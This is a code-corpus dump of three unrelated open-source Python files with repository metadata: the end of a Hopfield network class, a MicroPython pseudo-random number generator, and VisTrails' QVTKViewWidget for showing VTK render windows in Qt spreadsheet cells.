index = random.randrange(self.num_neurons)
patterns[:,index] = np.dot(self._weights[index,:], np.transpose(patterns))
return self._vec_activation(patterns)
else:
post_learn = patterns.copy()
inject(post_learn, 0)
indicies = set()
i = 1
while True:
index = random.randrange(self.num_neurons)
indicies.add(index)
post_learn[:,index] = np.dot(self._weights[index,:], np.transpose(patterns))
post_learn = self._vec_activation(post_learn)
inject(post_learn, i)
if np.array_equal(patterns, post_learn) and len(indicies) == self.num_neurons:
return self._vec_activation(post_learn)
patterns = post_learn.copy()
i += 1
def _activation(self, value, threshold=0):
"""
The network's activation function.
Defaults to the sign function.
"""
if value < threshold:
return -1
return 1
def _train_activation(self, value, threshold=0):
if value == threshold:
return value
elif value < threshold:
return -1
return 1
def _hebbian(self, patterns, threshold=0, inject= lambda x, y: None):
"""
Implements Hebbian learning.
"""
i = 1
for pattern in patterns:
prev = self._weights.copy()
self._weights += np.outer(pattern, pattern)
inject(prev, i)
i += 1
np.fill_diagonal(self._weights, 0)
self._weights = self._weights / len(patterns)
def _storkey(self, patterns, threshold=0, inject=lambda state, step: None):
"""
Implements Storkey learning.
"""
pass
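# Minimal usage sketch (illustrative only; the pattern format follows the
# example given in HopfieldNetwork.train's docstring, and the inject callback
# is assumed to receive the current state and the step index):
if __name__ == "__main__":
    net = HopfieldNetwork(3)
    net.train([[-1, 1, 1], [1, -1, 1]], method="hebbian")
    # Recall a stored pattern; a noisy probe should relax to the nearest one.
    recalled = net.learn([[-1, 1, 1]], mode="asynchronous",
                         inject=lambda state, step: None)
    print(recalled)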
|
robclewley/fovea
|
examples/hopfield/hopfield_network.py
|
Python
|
bsd-3-clause
| 6,549
|
[
"NEURON"
] |
2a66199c99719c2403526aee5e69bb81a038d6f5de2ffe8903fc768c3af65991
|
import time
def random():
""" Pseudo random number generator for micro python.
I make no claims about its randomness or suitability for use
Adapted from:
NUMERICAL RECIPES: THE ART OF SCIENTIFIC COMPUTING
THIRD EDITION
WILLIAM H. PRESS
SAUL A. TEUKOLSKY
WILLIAM T. VETTERLING
BRIAN P. FLANNERY
CAMBRIDGE UNIVERSITY PRESS
P.g. 342 - 343
"""
v = 4101842887655102017
u = time.ticks_cpu() ^ v
v = u
w = 4294957665 * (v & 0xffffffff) + (v >> 32)
v = v ^ (v >> 17)
v = v ^ (v << 31)
v = v ^ (v >> 8)
x = u ^ (u << 21)
x = x ^ (x >> 35)
x = x ^ (x << 4)
y = (x + v) ^ w
z=str(y)
y=int(z[14:])
return y*1E-14
def randint(a,b):
""" Returns random integer on the interval [a,b]
a and b must be positive integers with b > a"""
# TODO: add an assertion that a and b are integers, or coerce them in place
if a < 0 and b >0:
raise ValueError
if b <= a:
raise ValueError
if a < 0 and b < 0:
raise ValueError
else:
return int( a + ((b-a)*random()) )
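# Rough usage sketch (MicroPython context assumed, since time.ticks_cpu()
# only exists on those ports):
#   roll = randint(1, 6)   # pseudo-random int, intended for the range [1, 6]
#   p = random()           # float built from low decimal digits of the
#                          # generator state, scaled by 1e-14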
|
ichbinjakes/CodeExamples
|
random.py
|
Python
|
gpl-3.0
| 969
|
[
"Brian"
] |
e152d478f53bb772988d63b38fdcc34eec452689588d230289abbefd4c8978ef
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
################################################################################
# File QVTKViewWidget.py
# File for displaying a vtkRenderWindow in a Qt QWidget, ported from
# VTK/GUISupport/QVTK. Combined into a single class: QVTKViewWidget
################################################################################
import vtk
from PyQt4 import QtCore, QtGui
import sip
from core import system
from core.modules.module_registry import get_module_registry
from packages.spreadsheet.basic_widgets import SpreadsheetCell, CellLocation
from packages.spreadsheet.spreadsheet_cell import QCellWidget, QCellToolBar
import vtkcell_rc
import gc
from gui.qt import qt_super
import core.db.action
from core.vistrail.action import Action
from core.vistrail.port import Port
from core.vistrail import module
from core.vistrail import connection
from core.vistrail.module_function import ModuleFunction
from core.vistrail.module_param import ModuleParam
from core.vistrail.location import Location
from core.modules.vistrails_module import ModuleError
import copy
################################################################################
class VTKViewCell(SpreadsheetCell):
"""
VTKViewCell is a VisTrails Module that can display vtkRenderWindow inside a cell
"""
def __init__(self):
SpreadsheetCell.__init__(self)
self.cellWidget = None
def compute(self):
""" compute() -> None
Dispatch the vtkRenderer to the actual rendering widget
"""
renderView = self.forceGetInputFromPort('SetRenderView')
if renderView==None:
raise ModuleError(self, 'A vtkRenderView input is required.')
self.cellWidget = self.displayAndWait(QVTKViewWidget, (renderView,))
AsciiToKeySymTable = ( None, None, None, None, None, None, None,
None, None,
"Tab", None, None, None, None, None, None,
None, None, None, None, None, None,
None, None, None, None, None, None,
None, None, None, None,
"space", "exclam", "quotedbl", "numbersign",
"dollar", "percent", "ampersand", "quoteright",
"parenleft", "parenright", "asterisk", "plus",
"comma", "minus", "period", "slash",
"0", "1", "2", "3", "4", "5", "6", "7",
"8", "9", "colon", "semicolon", "less", "equal",
"greater", "question",
"at", "A", "B", "C", "D", "E", "F", "G",
"H", "I", "J", "K", "L", "M", "N", "O",
"P", "Q", "R", "S", "T", "U", "V", "W",
"X", "Y", "Z", "bracketleft",
"backslash", "bracketright", "asciicircum",
"underscore",
"quoteleft", "a", "b", "c", "d", "e", "f", "g",
"h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "braceleft", "bar", "braceright",
"asciitilde", "Delete",
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None)
class QVTKViewWidget(QCellWidget):
"""
QVTKViewWidget is the actual rendering widget that can display
vtkRenderer inside a Qt QWidget
"""
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
""" QVTKViewWidget(parent: QWidget, f: WindowFlags) -> QVTKViewWidget
Initialize QVTKViewWidget with a toolbar with its own device
context
"""
QCellWidget.__init__(self, parent, f | QtCore.Qt.MSWindowsOwnDC)
self.interacting = None
self.mRenWin = None
self.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)
self.setAttribute(QtCore.Qt.WA_PaintOnScreen)
self.setMouseTracking(True)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding,
QtGui.QSizePolicy.Expanding))
self.toolBarType = QVTKViewWidgetToolBar
self.setAnimationEnabled(True)
def removeObserversFromInteractorStyle(self):
""" removeObserversFromInteractorStyle() -> None
Remove all Python bindings from interactor style observers so that
the cell can be freed safely
"""
iren = self.mRenWin.GetInteractor()
if iren:
style = iren.GetInteractorStyle()
style.RemoveObservers("InteractionEvent")
style.RemoveObservers("EndPickEvent")
style.RemoveObservers("CharEvent")
style.RemoveObservers("MouseWheelForwardEvent")
style.RemoveObservers("MouseWheelBackwardEvent")
def addObserversToInteractorStyle(self):
""" addObserversToInteractorStyle() -> None
Assign observer to the current interactor style
"""
iren = self.mRenWin.GetInteractor()
if iren:
style = iren.GetInteractorStyle()
style.AddObserver("InteractionEvent", self.interactionEvent)
style.AddObserver("EndPickEvent", self.interactionEvent)
style.AddObserver("CharEvent", self.charEvent)
style.AddObserver("MouseWheelForwardEvent", self.interactionEvent)
style.AddObserver("MouseWheelBackwardEvent", self.interactionEvent)
def deleteLater(self):
""" deleteLater() -> None
Make sure to free render window resource when
deallocating. Overriding PyQt deleteLater to free up
resources
"""
self.renderer_maps = {}
for ren in self.getRendererList():
self.mRenWin.RemoveRenderer(ren)
self.removeObserversFromInteractorStyle()
self.SetRenderWindow(None)
QCellWidget.deleteLater(self)
def updateContents(self, inputPorts):
""" updateContents(inputPorts: tuple)
Updates the cell contents with new vtkRenderer
"""
(renderView, ) = inputPorts
renWin = renderView.vtkInstance.GetRenderWindow()
renWin.DoubleBufferOn()
self.SetRenderWindow(renWin)
renderView.vtkInstance.ResetCamera()
self.addObserversToInteractorStyle()
# renWin = self.GetRenderWindow()
# renderers = [renderView.vtkInstance.GetRenderer()]
# iren = renWin.GetInteractor()
# Update interactor style
# self.removeObserversFromInteractorStyle()
# if renderView==None:
# if iStyle==None:
# iStyleInstance = vtk.vtkInteractorStyleTrackballCamera()
# else:
# iStyleInstance = iStyle.vtkInstance
# iren.SetInteractorStyle(iStyleInstance)
# self.addObserversToInteractorStyle()
# Capture window into history for playback
# Call this at the end to capture the image after rendering
QCellWidget.updateContents(self, inputPorts)
def GetRenderWindow(self):
""" GetRenderWindow() -> vtkRenderWindow
Return the associated vtkRenderWindow
"""
if not self.mRenWin:
win = vtk.vtkRenderWindow()
win.DoubleBufferOn()
self.SetRenderWindow(win)
del win
return self.mRenWin
def SetRenderWindow(self,w):
""" SetRenderWindow(w: vtkRenderWindow)
Set a new render window to QVTKViewWidget and initialize the
interactor as well
"""
if w == self.mRenWin:
return
if self.mRenWin:
if self.mRenWin.GetMapped():
self.mRenWin.Finalize()
self.mRenWin = w
if self.mRenWin:
self.mRenWin.Register(None)
if system.systemType=='Linux':
try:
vp = '_%s_void_p' % (hex(int(QtGui.QX11Info.display()))[2:])
except TypeError:
#This was change for PyQt4.2
if isinstance(QtGui.QX11Info.display(),QtGui.Display):
display = sip.unwrapinstance(QtGui.QX11Info.display())
vp = '_%s_void_p' % (hex(display)[2:])
self.mRenWin.SetDisplayId(vp)
if not self.mRenWin.GetMapped():
self.mRenWin.GetInteractor().Initialize()
system.XDestroyWindow(self.mRenWin.GetGenericDisplayId(),
self.mRenWin.GetGenericWindowId())
self.mRenWin.Finalize()
self.mRenWin.SetWindowInfo(str(int(self.winId())))
else:
self.mRenWin.SetWindowInfo(str(int(self.winId())))
if self.isVisible():
self.mRenWin.Start()
def GetInteractor(self):
""" GetInteractor() -> vtkInteractor
Return the vtkInteractor control this QVTKViewWidget
"""
return self.GetRenderWindow().GetInteractor()
def event(self, e):
""" event(e: QEvent) -> depends on event type
Process window and interaction events
"""
if e.type()==QtCore.QEvent.ParentAboutToChange:
if self.mRenWin:
if self.mRenWin.GetMapped():
self.mRenWin.Finalize()
else:
if e.type()==QtCore.QEvent.ParentChange:
if self.mRenWin:
self.mRenWin.SetWindowInfo(str(int(self.winId())))
if self.isVisible():
self.mRenWin.Start()
if QtCore.QObject.event(self,e):
return 1
if e.type() == QtCore.QEvent.KeyPress:
self.keyPressEvent(e)
if e.isAccepted():
return e.isAccepted()
return qt_super(QVTKViewWidget, self).event(e)
# return QtGui.QWidget.event(self,e)
# Was this right? Wasn't this supposed to be QCellWidget.event()?
def resizeWindow(self, width, height):
""" resizeWindow(width: int, height: int) -> None
Work around vtk bugs for resizing window
"""
########################################################
# VTK - BUGGGGGGGGG - GRRRRRRRRR
# This is a 'bug' in vtkWin32OpenGLRenderWindow(.cxx)
# If a render window is mapped to screen, the actual
# window size is the client area of the window in Win32.
# However, this real window size is only updated through
# vtkWin32OpenGLRenderWindow::GetSize(). So this has to
# be called here to get the cell size correctly. This
# invalidates the condition in the next SetSize().
# We can use self.mRenWin.SetSize(0,0) here but it will
# cause flickering and decrease performance!
# SetPosition(curX,curY) also works here but slower.
self.mRenWin.GetSize()
self.mRenWin.SetSize(width, height)
if self.mRenWin.GetInteractor():
self.mRenWin.GetInteractor().SetSize(width, height)
def resizeEvent(self, e):
""" resizeEvent(e: QEvent) -> None
Re-adjust the vtkRenderWindow size when QVTKViewWidget is resized
"""
qt_super(QVTKViewWidget, self).resizeEvent(e)
if not self.mRenWin:
return
self.resizeWindow(self.width(), self.height())
self.mRenWin.Render()
def moveEvent(self,e):
""" moveEvent(e: QEvent) -> None
Echo the move event into vtkRenderWindow
"""
qt_super(QVTKViewWidget, self).moveEvent(e)
if not self.mRenWin:
return
self.mRenWin.SetPosition(self.x(),self.y())
def paintEvent(self, e):
""" paintEvent(e: QPaintEvent) -> None
Paint the QVTKViewWidget with vtkRenderWindow
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
if hasattr(self.mRenWin, 'UpdateGLRegion'):
self.mRenWin.UpdateGLRegion()
self.mRenWin.Render()
def SelectActiveRenderer(self,iren):
""" SelectActiveRenderer(iren: vtkRenderWindowIteractor) -> None
Only make the vtkRenderer below the mouse cursor active
"""
epos = iren.GetEventPosition()
rens = iren.GetRenderWindow().GetRenderers()
rens.InitTraversal()
for i in xrange(rens.GetNumberOfItems()):
ren = rens.GetNextItem()
ren.SetInteractive(ren.IsInViewport(epos[0], epos[1]))
def mousePressEvent(self,e):
""" mousePressEvent(e: QMouseEvent) -> None
Echo mouse event to vtkRenderWindowInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
isDoubleClick = e.type()==QtCore.QEvent.MouseButtonDblClick
iren.SetEventInformationFlipY(e.x(),e.y(),
ctrl,
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),
isDoubleClick,
None)
invoke = {QtCore.Qt.LeftButton:"LeftButtonPressEvent",
QtCore.Qt.MidButton:"MiddleButtonPressEvent",
QtCore.Qt.RightButton:"RightButtonPressEvent"}
self.SelectActiveRenderer(iren)
if ctrl:
e.ignore()
return
self.interacting = self.getActiveRenderer(iren)
if e.button() in invoke:
iren.InvokeEvent(invoke[e.button()])
def mouseMoveEvent(self,e):
""" mouseMoveEvent(e: QMouseEvent) -> None
Echo mouse event to vtkRenderWindowInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0), 0, None)
iren.InvokeEvent("MouseMoveEvent")
def enterEvent(self,e):
""" enterEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.InvokeEvent("EnterEvent")
def leaveEvent(self,e):
""" leaveEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.InvokeEvent("LeaveEvent")
def mouseReleaseEvent(self,e):
""" mouseReleaseEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),0,None)
invoke = {QtCore.Qt.LeftButton:"LeftButtonReleaseEvent",
QtCore.Qt.MidButton:"MiddleButtonReleaseEvent",
QtCore.Qt.RightButton:"RightButtonReleaseEvent"}
self.interacting = None
if e.button() in invoke:
iren.InvokeEvent(invoke[e.button()])
def keyPressEvent(self,e):
""" keyPressEvent(e: QKeyEvent) -> None
Disallow 'quit' key in vtkRenderWindowInteractor and sync the others
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ascii_key = None
if e.text().length()>0:
ascii_key = e.text().toLatin1()[0]
else:
ascii_key = chr(0)
keysym = self.ascii_to_key_sym(ord(ascii_key))
if not keysym:
keysym = self.qt_key_to_key_sym(e.key())
# Ignore 'q' or 'e' or Ctrl-anykey
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
shift = (e.modifiers()&QtCore.Qt.ShiftModifier)
if (keysym in ['q', 'e'] or ctrl):
e.ignore()
return
iren.SetKeyEventInformation(ctrl,shift,ascii_key, e.count(), keysym)
iren.InvokeEvent("KeyPressEvent")
if ascii_key:
iren.InvokeEvent("CharEvent")
def keyReleaseEvent(self,e):
""" keyReleaseEvent(e: QKeyEvent) -> None
Disallow 'quit' key in vtkRenderWindowInteractor and sync the others
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ascii_key = None
if e.text().length()>0:
ascii_key = e.text().toLatin1()[0]
else:
ascii_key = chr(0)
keysym = self.ascii_to_key_sym(ord(ascii_key))
if not keysym:
keysym = self.qt_key_to_key_sym(e.key())
# Ignore 'q' or 'e' or Ctrl-anykey
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
shift = (e.modifiers()&QtCore.Qt.ShiftModifier)
if (keysym in ['q','e'] or ctrl):
e.ignore()
return
iren.SetKeyEventInformation(ctrl, shift, ascii_key, e.count(), keysym)
iren.InvokeEvent("KeyReleaseEvent")
def wheelEvent(self,e):
""" wheelEvent(e: QWheelEvent) -> None
Zoom in/out while scrolling the mouse
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),0,None)
self.SelectActiveRenderer(iren)
if e.delta()>0:
iren.InvokeEvent("MouseWheelForwardEvent")
else:
iren.InvokeEvent("MouseWheelBackwardEvent")
def focusInEvent(self,e):
""" focusInEvent(e: QFocusEvent) -> None
Ignore focus event
"""
pass
def focusOutEvent(self,e):
""" focusOutEvent(e: QFocusEvent) -> None
Ignore focus event
"""
pass
def contextMenuEvent(self,e):
""" contextMenuEvent(e: QContextMenuEvent) -> None
Make sure to get the right mouse position for the context menu
event, i.e. also the right click
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ctrl = int(e.modifiers()&QtCore.Qt.ControlModifier)
shift = int(e.modifiers()&QtCore.Qt.ShiftModifier)
iren.SetEventInformationFlipY(e.x(),e.y(),ctrl,shift,chr(0),0,None)
iren.InvokeEvent("ContextMenuEvent")
def ascii_to_key_sym(self,i):
""" ascii_to_key_sym(i: int) -> str
Convert ASCII code into key name
"""
global AsciiToKeySymTable
return AsciiToKeySymTable[i]
def qt_key_to_key_sym(self,i):
""" qt_key_to_key_sym(i: QtCore.Qt.Keycode) -> str
Convert Qt key code into key name
"""
handler = {QtCore.Qt.Key_Backspace:"BackSpace",
QtCore.Qt.Key_Tab:"Tab",
QtCore.Qt.Key_Backtab:"Tab",
QtCore.Qt.Key_Return:"Return",
QtCore.Qt.Key_Enter:"Return",
QtCore.Qt.Key_Shift:"Shift_L",
QtCore.Qt.Key_Control:"Control_L",
QtCore.Qt.Key_Alt:"Alt_L",
QtCore.Qt.Key_Pause:"Pause",
QtCore.Qt.Key_CapsLock:"Caps_Lock",
QtCore.Qt.Key_Escape:"Escape",
QtCore.Qt.Key_Space:"space",
QtCore.Qt.Key_End:"End",
QtCore.Qt.Key_Home:"Home",
QtCore.Qt.Key_Left:"Left",
QtCore.Qt.Key_Up:"Up",
QtCore.Qt.Key_Right:"Right",
QtCore.Qt.Key_Down:"Down",
QtCore.Qt.Key_SysReq:"Snapshot",
QtCore.Qt.Key_Insert:"Insert",
QtCore.Qt.Key_Delete:"Delete",
QtCore.Qt.Key_Help:"Help",
QtCore.Qt.Key_0:"0",
QtCore.Qt.Key_1:"1",
QtCore.Qt.Key_2:"2",
QtCore.Qt.Key_3:"3",
QtCore.Qt.Key_4:"4",
QtCore.Qt.Key_5:"5",
QtCore.Qt.Key_6:"6",
QtCore.Qt.Key_7:"7",
QtCore.Qt.Key_8:"8",
QtCore.Qt.Key_9:"9",
QtCore.Qt.Key_A:"a",
QtCore.Qt.Key_B:"b",
QtCore.Qt.Key_C:"c",
QtCore.Qt.Key_D:"d",
QtCore.Qt.Key_E:"e",
QtCore.Qt.Key_F:"f",
QtCore.Qt.Key_G:"g",
QtCore.Qt.Key_H:"h",
QtCore.Qt.Key_I:"i",
QtCore.Qt.Key_J:"j",
QtCore.Qt.Key_K:"k",
QtCore.Qt.Key_L:"l",
QtCore.Qt.Key_M:"m",
QtCore.Qt.Key_N:"n",
QtCore.Qt.Key_O:"o",
QtCore.Qt.Key_P:"p",
QtCore.Qt.Key_Q:"q",
QtCore.Qt.Key_R:"r",
QtCore.Qt.Key_S:"s",
QtCore.Qt.Key_T:"t",
QtCore.Qt.Key_U:"u",
QtCore.Qt.Key_V:"v",
QtCore.Qt.Key_W:"w",
QtCore.Qt.Key_X:"x",
QtCore.Qt.Key_Y:"y",
QtCore.Qt.Key_Z:"z",
QtCore.Qt.Key_Asterisk:"asterisk",
QtCore.Qt.Key_Plus:"plus",
QtCore.Qt.Key_Minus:"minus",
QtCore.Qt.Key_Period:"period",
QtCore.Qt.Key_Slash:"slash",
QtCore.Qt.Key_F1:"F1",
QtCore.Qt.Key_F2:"F2",
QtCore.Qt.Key_F3:"F3",
QtCore.Qt.Key_F4:"F4",
QtCore.Qt.Key_F5:"F5",
QtCore.Qt.Key_F6:"F6",
QtCore.Qt.Key_F7:"F7",
QtCore.Qt.Key_F8:"F8",
QtCore.Qt.Key_F9:"F9",
QtCore.Qt.Key_F10:"F10",
QtCore.Qt.Key_F11:"F11",
QtCore.Qt.Key_F12:"F12",
QtCore.Qt.Key_F13:"F13",
QtCore.Qt.Key_F14:"F14",
QtCore.Qt.Key_F15:"F15",
QtCore.Qt.Key_F16:"F16",
QtCore.Qt.Key_F17:"F17",
QtCore.Qt.Key_F18:"F18",
QtCore.Qt.Key_F19:"F19",
QtCore.Qt.Key_F20:"F20",
QtCore.Qt.Key_F21:"F21",
QtCore.Qt.Key_F22:"F22",
QtCore.Qt.Key_F23:"F23",
QtCore.Qt.Key_F24:"F24",
QtCore.Qt.Key_NumLock:"Num_Lock",
QtCore.Qt.Key_ScrollLock:"Scroll_Lock"}
if i in handler:
return handler[i]
else:
return "None"
def getRendererList(self):
""" getRendererList() -> list
Return a list of vtkRenderer running in this QVTKViewWidget
"""
result = []
renWin = self.GetRenderWindow()
renderers = renWin.GetRenderers()
renderers.InitTraversal()
for i in xrange(renderers.GetNumberOfItems()):
result.append(renderers.GetNextItem())
return result
def getActiveRenderer(self, iren):
""" getActiveRenderer(iren: vtkRenderWindowwInteractor) -> vtkRenderer
Return the active vtkRenderer under mouse
"""
epos = list(iren.GetEventPosition())
if epos[1]<0:
epos[1] = -epos[1]
rens = iren.GetRenderWindow().GetRenderers()
rens.InitTraversal()
for i in xrange(rens.GetNumberOfItems()):
ren = rens.GetNextItem()
if ren.IsInViewport(epos[0], epos[1]):
return ren
return None
def findSheetTabWidget(self):
""" findSheetTabWidget() -> QTabWidget
Find and return the sheet tab widget
"""
p = self.parent()
while p:
if hasattr(p, 'isSheetTabWidget'):
if p.isSheetTabWidget()==True:
return p
p = p.parent()
return None
def getRenderersInCellList(self, sheet, cells):
""" isRendererIn(sheet: spreadsheet.StandardWidgetSheet,
cells: [(int,int)]) -> bool
Get the list of renderers in side a list of (row, column)
cells.
"""
rens = []
for (row, col) in cells:
cell = sheet.getCell(row, col)
if hasattr(cell, 'getRendererList'):
rens += cell.getRendererList()
return rens
def getSelectedCellWidgets(self):
sheet = self.findSheetTabWidget()
if sheet:
iren = self.mRenWin.GetInteractor()
ren = self.interacting
if not ren: ren = self.getActiveRenderer(iren)
if ren:
cells = sheet.getSelectedLocations()
if (ren in self.getRenderersInCellList(sheet, cells)):
return [sheet.getCell(row, col)
for (row, col) in cells
if hasattr(sheet.getCell(row, col),
'getRendererList')]
return []
def interactionEvent(self, istyle, name):
""" interactionEvent(istyle: vtkInteractorStyle, name: str) -> None
Make sure interactions sync across selected renderers
"""
if name=='MouseWheelForwardEvent':
istyle.OnMouseWheelForward()
if name=='MouseWheelBackwardEvent':
istyle.OnMouseWheelBackward()
ren = self.interacting
if not ren:
ren = self.getActiveRenderer(istyle.GetInteractor())
if ren:
cam = ren.GetActiveCamera()
cpos = cam.GetPosition()
cfol = cam.GetFocalPoint()
cup = cam.GetViewUp()
for cell in self.getSelectedCellWidgets():
if cell!=self and hasattr(cell, 'getRendererList'):
rens = cell.getRendererList()
for r in rens:
if r!=ren:
dcam = r.GetActiveCamera()
dcam.SetPosition(cpos)
dcam.SetFocalPoint(cfol)
dcam.SetViewUp(cup)
r.ResetCameraClippingRange()
cell.update()
def charEvent(self, istyle, name):
""" charEvent(istyle: vtkInteractorStyle, name: str) -> None
Make sure key presses also sync across selected renderers
"""
iren = istyle.GetInteractor()
ren = self.interacting
if not ren: ren = self.getActiveRenderer(iren)
if ren:
keyCode = iren.GetKeyCode()
if keyCode in ['w','W','s','S','r','R','p','P']:
for cell in self.getSelectedCellWidgets():
if hasattr(cell, 'GetInteractor'):
selectedIren = cell.GetInteractor()
selectedIren.SetKeyCode(keyCode)
selectedIren.GetInteractorStyle().OnChar()
selectedIren.Render()
istyle.OnChar()
def saveToPNG(self, filename):
""" saveToPNG(filename: str) -> filename or vtkUnsignedCharArray
Save the current widget contents to an image file. If
filename is None, then it returns the vtkUnsignedCharArray containing
the PNG image. Otherwise, the filename is returned.
"""
w2i = vtk.vtkWindowToImageFilter()
w2i.ReadFrontBufferOff()
w2i.SetInput(self.mRenWin)
# Render twice to get a clean image on the back buffer
self.mRenWin.Render()
self.mRenWin.Render()
w2i.Update()
writer = vtk.vtkPNGWriter()
writer.SetInputConnection(w2i.GetOutputPort())
if filename!=None:
writer.SetFileName(filename)
else:
writer.WriteToMemoryOn()
writer.Write()
if filename:
return filename
else:
return writer.GetResult()
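# Typical calls, per the docstring above ("widget" being a QVTKViewWidget):
#   widget.saveToPNG("snapshot.png")   # writes the file, returns its name
#   data = widget.saveToPNG(None)      # returns the in-memory PNG as a
#                                      # vtkUnsignedCharArray (this is what
#                                      # grabWindowPixmap below relies on)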
def captureWindow(self):
""" captureWindow() -> None
Capture the window contents to file
"""
fn = QtGui.QFileDialog.getSaveFileName(None,
"Save file as...",
"screenshot.png",
"Images (*.png)")
if fn.isNull():
return
self.saveToPNG(str(fn))
def grabWindowPixmap(self):
""" grabWindowImage() -> QPixmap
Widget special grabbing function
"""
uchar = self.saveToPNG(None)
ba = QtCore.QByteArray()
buf = QtCore.QBuffer(ba)
buf.open(QtCore.QIODevice.WriteOnly)
for i in xrange(uchar.GetNumberOfTuples()):
c = uchar.GetValue(i)
buf.putChar(chr(c))
buf.close()
pixmap = QtGui.QPixmap()
pixmap.loadFromData(ba, 'PNG')
return pixmap
def dumpToFile(self, filename):
"""dumpToFile() -> None
Dumps itself as an image to a file, calling saveToPNG
"""
self.saveToPNG(filename)
class QVTKViewWidgetCapture(QtGui.QAction):
"""
QVTKViewWidgetCapture is the action to capture the vtk rendering
window to an image
"""
def __init__(self, parent=None):
""" QVTKViewWidgetCapture(parent: QWidget) -> QVTKViewWidgetCapture
Setup the image, status tip, etc. of the action
"""
QtGui.QAction.__init__(self,
QtGui.QIcon(":/images/camera.png"),
"&Capture image to file",
parent)
self.setStatusTip("Capture the rendered image to a file")
def triggeredSlot(self, checked=False):
""" toggledSlot(checked: boolean) -> None
Execute the action when the button is clicked
"""
cellWidget = self.toolBar.getSnappedWidget()
cellWidget.captureWindow()
class QVTKViewWidgetSaveCamera(QtGui.QAction):
"""
QVTKViewWidgetSaveCamera is the action to capture the current camera
of the vtk renderers and save it back to the pipeline
"""
def __init__(self, parent=None):
""" QVTKViewWidgetSaveCamera(parent: QWidget) -> QVTKViewWidgetSaveCamera
Setup the image, status tip, etc. of the action
"""
QtGui.QAction.__init__(self,
"Save &Camera",
parent)
self.setStatusTip("Save current camera views to the pipeline")
def setCamera(self, controller):
ops = []
pipeline = controller.current_pipeline
cellWidget = self.toolBar.getSnappedWidget()
renderers = cellWidget.getRendererList()
for ren in renderers:
cam = ren.GetActiveCamera()
cpos = cam.GetPosition()
cfol = cam.GetFocalPoint()
